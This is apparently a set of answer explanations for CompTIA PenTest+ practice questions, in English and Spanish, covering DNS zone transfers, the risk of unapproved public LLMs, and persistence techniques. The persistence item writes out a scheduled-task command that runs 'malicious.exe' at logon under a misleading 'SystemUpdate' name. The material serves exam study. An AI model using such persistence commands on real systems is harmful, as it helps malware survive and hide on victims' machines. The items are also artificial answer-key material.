Option D (Revoke access for valid users) ❌: The logs show new badges being printed, not revocation.

???? Reference: CompTIA PenTest+ PT0-003 Official Guide – Physical Security Testing

La opción C, dig axfr @local.dns.server, realiza una transferencia de zona DNS (Zone Transfer). Si el servidor DNS está mal configurado y permite este tipo de solicitudes, el atacante puede obtener todos los registros DNS del dominio interno.

La opción A muestra solo registros A/AAAA. La B no hace enumeración completa. La D no es válida como sintaxis.

Referencia: PT0-003 Objective 3.3 – Perform domain enumeration using dig and DNS zone transfer techniques.

The correct answer is A. Accidental loss of internal data

Unauthorized use of public LLMs creates a risk that employees may paste sensitive company information into external AI services. This can include internal documents, source code, customer data, security details, architecture diagrams, incident information, or confidential business content.

Because the LLM services are not approved by IT, the organization may not have controls for data handling, retention, monitoring, contractual protection, or data loss prevention. The broadest and best description of the risk is accidental loss of internal data.

B is incorrect because public disclosure of intellectual property is possible, but it is a narrower example of internal data loss.

C is incorrect because employee credentials could be exposed, but the question does not indicate credential theft or active exfiltration.

D is incorrect because prompt injection is an attack against LLM behavior. The scenario describes unauthorized use of public LLM services, not manipulation of an LLM through malicious prompts.

In PenTest+ terms, this falls under Information Gathering and Vulnerability Scanning, specifically identifying unauthorized services, shadow IT, data exposure risks, and AI/LLM-related security concerns.

To maintain persistence after a reboot, the tester needs a method that automatically restarts when the system reboots.

Option A (Reverse shell) ❌: Reverse shells do not persist after a reboot unless paired with scheduled tasks or registry modifications.

Option B (Process injection) ❌: Injecting into a process is temporary—once the system reboots, the injected process is gone.

Option C (Scheduled task) ✅: Correct.

A scheduled task can execute malware, reverse shells, or scripts on system startup, ensuring persistence.

Example:

schtasks /create /sc onlogon /tn " SystemUpdate " /tr " C:\malicious.exe "

Option D (Credential dumping) ❌: While useful for privilege escalation, it does not provide persistence.

???? Reference: CompTIA PenTest+ PT0-003 Official Guide – Persistence Techniques

A computer screen shot of a computer Description automatically generated

A screen shot of a computer Description automatically generated

A computer screen with white text Description automatically generated

An orange screen with white text Description automatically generated